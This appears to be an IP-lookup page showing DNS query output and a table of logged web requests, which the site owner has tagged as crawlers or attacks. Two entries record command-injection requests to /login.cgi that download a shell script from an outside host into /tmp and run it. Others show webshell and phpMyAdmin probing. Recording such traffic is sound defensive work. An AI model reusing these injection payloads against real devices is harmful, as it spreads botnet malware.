City: unknown
Region: unknown
Country: United States
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 172.67.97.49
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 61048
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;172.67.97.49. IN A
;; AUTHORITY SECTION:
. 250 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022022700 1800 900 604800 86400
;; Query time: 60 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun Feb 27 22:57:56 CST 2022
;; MSG SIZE rcvd: 105Host 49.97.67.172.in-addr.arpa. not found: 3(NXDOMAIN)Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 49.97.67.172.in-addr.arpa: NXDOMAIN| IP | Type | Details | Datetime |
|---|---|---|---|
| 69.30.243.244 | bots | 疑似伪造UA爬虫 69.30.243.244 - - [05/May/2019:12:19:24 +0800] "GET /check-ip/113.53.83.48 HTTP/1.1" 200 10113 "https://ipinfo.asytech.cn" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" 69.30.243.244 - - [05/May/2019:12:19:24 +0800] "GET /check-ip/171.7.246.129 HTTP/1.1" 200 9681 "https://ipinfo.asytech.cn" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 69.30.243.244 - - [05/May/2019:12:19:25 +0800] "GET /check-ip/64.49.72.210 HTTP/1.1" 200 10263 "https://ipinfo.asytech.cn" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" 69.30.243.244 - - [05/May/2019:12:19:26 +0800] "GET /check-ip/36.89.134.161 HTTP/1.1" 200 10302 "https://ipinfo.asytech.cn" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 69.30.243.244 - - [05/May/2019:12:19:27 +0800] "GET /check-ip/36.67.134.3 HTTP/1.1" 200 9927 "https://ipinfo.asytech.cn" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 69.30.243.244 - - [05/May/2019:12:19:28 +0800] "GET /check-ip/75.141.151.0 HTTP/1.1" 200 10497 "https://ipinfo.asytech.cn" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 69.30.243.244 - - [05/May/2019:12:19:30 +0800] "GET /check-ip/36.75.67.63 HTTP/1.1" 200 10095 "https://ipinfo.asytech.cn" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" |
2019-05-05 12:24:28 |
| 43.241.215.172 | botsattack | 43.241.215.172 - - [05/May/2019:16:49:00 +0800] "GET /otsmobile/app/mgs/mgw.htm?operationType=com.cars.otsmobile.queryLeftTicket&requestData=%5B%7B%22train_date%22%3A%2220190520%22%2C%22purpose_codes%22%3A%2200%22%2C%22from_station%22%3A%22BJP%22%2C%22to_station%22%3A%22WHN%22%2C%22station_train_code%22%3A%22Z35%22%2C%22start_time_begin%22%3A%220000%22%2C%22start_time_end%22%3A%222400%22%2C%22train_headers%22%3A%22QB%23%22%2C%22train_flag%22%3A%22%22%2C%22seat_type%22%3A%220%22%2C%22seatBack_Type%22%3A%22%22%2C%22ticket_num%22%3A%22%22%2C%22dfpStr%22%3A%22%22%2C%22secret_str%22%3A%22%E5%90%8E%E5%8F%B0%E5%BC%80%E5%85%B3%E8%8E%B7%E5%8F%96%E5%A4%B1%E8%B4%A5%EF%BC%8C%E6%88%96%E9%85%8D%E7%BD%AE%E5%BC%80%E5%85%B3%E4%B8%BAfalse.null%22%2C%22baseDTO%22%3A%7B%22check_code%22%3A%22597cd02b91ba2b4b481dfe54f24ae30d%22%2C%22device_no%22%3A%22XM6jfCnBCbQDAMXCxZeB4eo1%22%2C%22mobile_no%22%3A%22%22%2C%22os_type%22%3A%22a%22%2C%22time_str%22%3A%2220190505164900%22%2C%22user_name%22%3A%22%22%2C%22version_no%22%3A%223.0.0.12121430%22%7D%7D%5D&ts=1557046140303&sign= HTTP/1.1" 404 209 "-" "Apache-HttpClient/4.5.6 (Java/1.8.0_211)" |
2019-05-05 16:50:15 |
| 66.206.0.172 | bots | 66.206.0.172 - - [26/Apr/2019:13:04:22 +0800] "GET /check-ip/164.52.24.166 HTTP/1.1" 200 88138 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; da-DK) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13.3" 66.206.0.172 - - [26/Apr/2019:13:04:22 +0800] "GET /check-ip/82.84.38.225 HTTP/1.1" 200 87804 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE) AppleWebKit/532+ (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10" 66.206.0.172 - - [26/Apr/2019:13:04:22 +0800] "GET /check-ip/182.61.19.216 HTTP/1.1" 200 87592 "-" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.02" 66.206.0.172 - - [26/Apr/2019:13:04:24 +0800] "GET /check-ip/36.65.239.162 HTTP/1.1" 200 88243 "-" "Mozilla/5.0 (Windows; U; Win 9x 4.90; de-AT; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18" 66.206.0.172 - - [26/Apr/2019:13:04:26 +0800] "GET /check-ip/112.3.24.45 HTTP/1.1" 200 89853 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.3a1pre) Gecko/20091219 Minefield/3.7a1pre" |
2019-04-26 13:05:03 |
| 118.89.144.131 | attack | 118.89.144.131 - - [01/May/2019:08:35:03 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.112.150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 182 "-" "LMAO/2.0" |
2019-05-01 08:36:01 |
| 104.238.37.208 | bots | 爬虫 |
2019-05-12 17:48:32 |
| 139.162.184.185 | bots | 139.162.184.185 - - [04/May/2019:19:47:40 +0800] "\\x15\\x03\\x00\\x00\\x02\\x01\\x00" 400 182 "-" "-" 139.162.184.185 - - [04/May/2019:19:47:40 +0800] "\\x15\\x03\\x00\\x00\\x02\\x01\\x00" 400 182 "-" "-" 139.162.184.185 - - [04/May/2019:19:47:40 +0800] "\\x15\\x03\\x00\\x00\\x02\\x01\\x00" 400 182 "-" "-" 139.162.184.185 - - [04/May/2019:19:47:40 +0800] "\\x15\\x03\\x00\\x00\\x02\\x01\\x00" 400 182 "-" "-" 139.162.184.185 - - [04/May/2019:19:47:40 +0800] "\\x15\\x03\\x00\\x00\\x02\\x01\\x00" 400 182 "-" "-" 139.162.184.185 - - [04/May/2019:19:47:40 +0800] "\\x15\\x03\\x00\\x00\\x02\\x01\\x00" 400 182 "-" "-" |
2019-05-04 20:01:41 |
| 212.64.58.150 | botsattack | 212.64.58.150 - - [06/May/2019:16:23:01 +0800] "POST /luoke.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 212.64.58.150 - - [06/May/2019:16:23:01 +0800] "POST /nidage.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 212.64.58.150 - - [06/May/2019:16:23:01 +0800] "POST /sanan.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 212.64.58.150 - - [06/May/2019:16:23:01 +0800] "POST /sbkcb.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 212.64.58.150 - - [06/May/2019:16:23:05 +0800] "POST /cnm.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 212.64.58.150 - - [06/May/2019:16:23:05 +0800] "POST /tests.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 212.64.58.150 - - [06/May/2019:16:23:05 +0800] "POST /luoran.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 212.64.58.150 - - [06/May/2019:16:23:05 +0800] "POST /luoran6.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 212.64.58.150 - - [06/May/2019:16:23:05 +0800] "POST /asen.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 212.64.58.150 - - [06/May/2019:16:23:05 +0800] "POST /MCLi.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 212.64.58.150 - - [06/May/2019:16:23:05 +0800] "POST /MCLi.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 212.64.58.150 - - [06/May/2019:16:23:05 +0800] "POST /coon.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" |
2019-05-06 16:23:50 |
| 106.12.95.181 | attack | 106.12.95.181 - - [06/May/2019:21:10:47 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://194.147.32.131/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 182 "-" "Hakai/2.0" |
2019-05-06 21:11:47 |
| 17.58.102.110 | bots | 17.58.102.110 - - [03/May/2019:10:02:11 +0800] "GET /robots.txt HTTP/1.1" 200 472 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1; +http://www.apple.com/go/applebot)" 17.58.102.110 - - [03/May/2019:10:02:12 +0800] "GET / HTTP/1.1" 200 3299 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1; +http://www.apple.com/go/applebot)" |
2019-05-03 10:03:35 |
| 35.202.223.242 | bots | ltx71爬虫,可以禁掉 35.202.223.242 - - [27/Apr/2019:06:45:25 +0800] "GET /robots.txt HTTP/1.1" 200 472 "-" "ltx71 - (http://ltx71.com/)" |
2019-04-27 06:47:27 |
| 36.27.67.156 | bots | Google Adsense爬虫,需要登录信息 36.27.67.156 - - [28/Apr/2019:20:17:53 +0800] "POST /cloud/index.php/login HTTP/1.1" 302 5497 "https://www.google.com/adsense/new/u/0/pub-4033115867612748/main/sitepermissions" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36" "/cloud/index.php/login" 36.27.67.156 - - [28/Apr/2019:20:17:54 +0800] "GET /cloud/index.php/login HTTP/1.1" 303 1150 "https://www.google.com/adsense/new/u/0/pub-4033115867612748/main/sitepermissions" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36" "https://asytech.cn/cloud/index.php/apps/files/" 36.27.67.156 - - [28/Apr/2019:20:17:54 +0800] "GET /cloud/index.php/apps/files/ HTTP/1.1" 200 8484 "https://www.google.com/adsense/new/u/0/pub-4033115867612748/main/sitepermissions" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36" "-" |
2019-04-28 20:21:35 |
| 180.153.186.142 | bots | 180.153.186.142 - - [06/May/2019:15:23:56 +0800] "GET / HTTP/1.1" 301 194 "-" "Mozilla/5.0 (compatible; Wappalyzer)" 180.153.186.142 - - [06/May/2019:15:23:57 +0800] "GET / HTTP/1.1" 200 10365 "http://118.25.52.138/" "Mozilla/5.0 (compatible; Wappalyzer)" 180.153.186.142 - - [06/May/2019:15:24:03 +0800] "HEAD / HTTP/1.1" 301 0 "-" "Chrome/54.0 (Windows NT 10.0)" 180.153.186.142 - - [06/May/2019:15:24:05 +0800] "HEAD / HTTP/1.1" 200 0 "-" "Chrome/54.0 (Windows NT 10.0)" 180.153.186.142 - - [06/May/2019:15:24:05 +0800] "HEAD / HTTP/1.1" 301 0 "-" "chrome 100" 101.198.186.223 - - [06/May/2019:15:24:05 +0800] "GET / HTTP/1.1" 301 194 "-" "Chrome/54.0 (Windows NT 10.0)" 101.198.186.223 - - [06/May/2019:15:24:06 +0800] "GET / HTTP/1.1" 200 10365 "-" "Chrome/54.0 (Windows NT 10.0)" |
2019-05-06 15:28:30 |
| 110.249.212.46 | attackproxy | 110.249.212.46 - - [29/Apr/2019:09:59:33 +0800] "GET http://110.249.212.46/testget?q=23333&port=80 HTTP/1.1" 400 182 "-" "-" |
2019-04-29 10:04:47 |
| 129.204.239.125 | attack | 129.204.239.125 - - [27/Apr/2019:05:15:17 +0800] "GET /phpmyadmin HTTP/1.1" 301 194 "http://118.25.52.138/phpmyadmin" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 129.204.239.125 - - [27/Apr/2019:05:15:17 +0800] "GET /phpmyadmin HTTP/1.1" 404 232 "http://118.25.52.138/phpmyadmin" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 129.204.239.125 - - [27/Apr/2019:05:15:17 +0800] "GET /phpmyadmin HTTP/1.1" 301 194 "http://118.25.52.138/phpmyadmin" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 129.204.239.125 - - [27/Apr/2019:05:15:17 +0800] "GET /phpmyadmin HTTP/1.1" 404 232 "http://118.25.52.138/phpmyadmin" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-27 06:48:37 |
| 64.233.173.174 | botsnormal | 是正常用户但是使用了GOOGLE的语音转文本服务 64.233.173.174 - - [28/Apr/2019:17:14:36 +0800] "GET /check-ip/148.72.41.76 HTTP/1.1" 200 9994 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googl e-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" 64.233.173.174 - - [28/Apr/2019:17:14:36 +0800] "GET /static/bootstrap/js/bootstrap.min.js HTTP/1.1" 200 48944 "https://ipinfo.asytech.cn/check-ip/148.72.41.76" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Geck o) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" 64.233.172.172 - - [28/Apr/2019:17:14:36 +0800] "GET /check-ip/148.72.41.76 HTTP/1.1" 200 9862 "-" "Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko; googleweblight) Chrome/38.0.1025.166 Mobile Safari/53 5.19" 64.233.173.176 - - [28/Apr/2019:17:14:37 +0800] "GET /check-ip/148.72.41.76 HTTP/1.1" 200 10135 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Goog le-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" 64.233.173.174 - - [28/Apr/2019:17:14:37 +0800] "GET /static/bootstrap/js/popper.min.js HTTP/1.1" 200 19188 "https://ipinfo.asytech.cn/check-ip/148.72.41.76" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" |
2019-04-28 17:49:13 |